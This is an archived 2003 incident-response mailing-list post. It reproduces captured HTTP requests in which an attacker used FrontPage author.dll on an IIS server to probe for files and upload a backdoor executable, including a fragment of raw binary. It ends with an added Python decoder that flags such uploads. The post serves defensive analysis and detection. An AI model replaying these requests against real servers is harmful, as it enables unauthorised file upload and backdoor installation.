We had a recent compromise that our IDS did not detect; however, it did detect subsequent backdoor activity and a few other packets afterwards that alerted us to the compromise. Upon closer investigation of the activity, some of the additional information logged showed some FrontPage extensions being used in an interesting way. Anyone else seen this? Since we were unable to determine the initial compromise method, I'm trying to figure out if this was purely used as a backdoor, or might also have been the same method as the initial compromise.

Some additional background info: the svchost.exe is a renamed Serv-U FTP daemon process that was loaded onto the server along with a few other 'normal' backdoor tools.

--
Jordan Wiens
UF Network Incident Response Team
(352)392-2061

ATTACK:
---------------
POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
Date: Tue, 01 Jul 2003 20:33:10 GMT
MIME-Version: 1.0
User-Agent: MSFrontPage/4.0
Host: aaa.bbb.ccc.ddd
Accept: auth/sicily
Content-Length: 112
Content-Type: application/x-www-form-urlencoded
X-Vermeer-Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Cache-Control: no-cache

method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d&listHiddenDocs=false&listLinkInfo=true

SERVER RESPONSE:
---------------
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 01 Jul 2003 20:30:02 GMT

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Tue, 01 Jul 2003 20:30:02 GMT
Connection: close
Content-type: application/x-vermeer-rpc
X-FrontPage-User-Name: IUSR_MACHINE

<html><head><title>vermeer RPC packet</title></head>
<body>
<p>method=getDocsMetaInfo:4.0.2.4715
<p>document_list=
<ul>
</ul>
<p>failedUrls=
<ul>
<li>svchost.exe
</ul>
</body>
</html>

Additional session....
ATTACKER:
---------------
POST /_vti_bin/_vti_aut/author.dll HTTP/1.1
Date: Tue, 01 Jul 2003 20:33:29 GMT
MIME-Version: 1.0
User-Agent: MSFrontPage/4.0
Host: aaa.bbb.ccc.ddd
Accept: auth/sicily
Content-Length: 2142969
Content-Type: application/x-vermeer-urlencoded
X-Vermeer-Content-Type: application/x-vermeer-urlencoded
Connection: Keep-Alive
Cache-Control: no-cache

SERVER:
---------------
HTTP/1.1 100 Continue
Server: Microsoft-IIS/5.0
Date: Tue, 01 Jul 2003 20:30:21 GMT

ATTACKER:
---------------
method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument%5fname%3dsvss%2eexe%3bmeta%5finfo%3d%5bvti%5fmodifiedby%3bSW%7cAdministrator%3bvti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit&comment=&keep%5fchecked%5fout=false
MZP@!L!This program must be run under Win32 $7PELW] < @p! > xp pK.text `.data@.tls*@.rdata,@P.idata .@@.edataF@@.rsrcxH@@.relocp @Pfb:C++HOOK,[[#[RjYZp/jYh[j3'[jg3['[`PS htM=[s
. . Additional raw data. .
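The two captures show a FrontPage RPC probe (getDocsMetaInfo) for svchost.exe followed by a put document upload of svss.exe through author.dll. The following decoder is an added example, not code from the original post: it pulls the method name and the referenced filenames out of such request bodies and flags requests that write, or probe for, executables. The sample bodies are constructed from the captures above, and the list of executable extensions is an assumption.

```python
"""Decode FrontPage Server Extensions (vermeer) RPC request bodies sent to
author.dll and flag those that reference executable files."""
import re
from urllib.parse import parse_qs

# Assumed list of extensions worth alerting on; tune to the environment.
EXEC_EXT = (".exe", ".dll", ".com", ".bat", ".cmd", ".scr", ".pif")

# Constructed sample bodies modelled on the captured sessions above.
SAMPLE_BODIES = [
    "method=getDocsMetaInfo%3a4%2e0%2e2%2e4715&url%5flist=%5bsvchost%2eexe%5d"
    "&listHiddenDocs=false&listLinkInfo=true",
    "method=put+document%3a4%2e0%2e2%2e4715&service%5fname=&document=%5bdocument"
    "%5fname%3dsvss%2eexe%3bmeta%5finfo%3d%5bvti%5fmodifiedby%3bSW%7cAdministrator"
    "%3bvti%5fauthor%3bSW%7cAdministrator%5d%5d&put%5foption=edit&comment="
    "&keep%5fchecked%5fout=false",
    "method=list+documents%3a4%2e0%2e2%2e4715&service%5fname=&listHiddenDocs=false",
]


def decode_rpc(body: str) -> dict:
    """Return the RPC method, its version and every filename the request names."""
    params = parse_qs(body, keep_blank_values=True)  # decodes %xx and '+'
    method, _, version = params.get("method", [""])[0].partition(":")
    files = []
    for entry in params.get("url_list", []):          # url_list=[a.exe;b.htm]
        files += [f for f in entry.strip("[]").split(";") if f]
    for entry in params.get("document", []):          # document=[document_name=x;meta_info=[...]]
        match = re.search(r"document_name=([^;\]]+)", entry)
        if match:
            files.append(match.group(1))
    return {"method": method, "version": version, "files": files}


def classify(body: str):
    """'executable-write' for put/move of an executable, 'executable-probe' for
    any other method that names one, None when no executable is referenced."""
    rpc = decode_rpc(body)
    if not any(f.lower().endswith(EXEC_EXT) for f in rpc["files"]):
        return None
    if rpc["method"].startswith(("put ", "move ")):
        return "executable-write"
    return "executable-probe"


if __name__ == "__main__":
    for body in SAMPLE_BODIES:
        rpc = decode_rpc(body)
        print(f"{rpc['method']:<20} {rpc['files']!s:<20} -> {classify(body)}")
```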
This archive was generated by hypermail 2b30 : Thu Jul 03 2003 - 08:18:56 PDT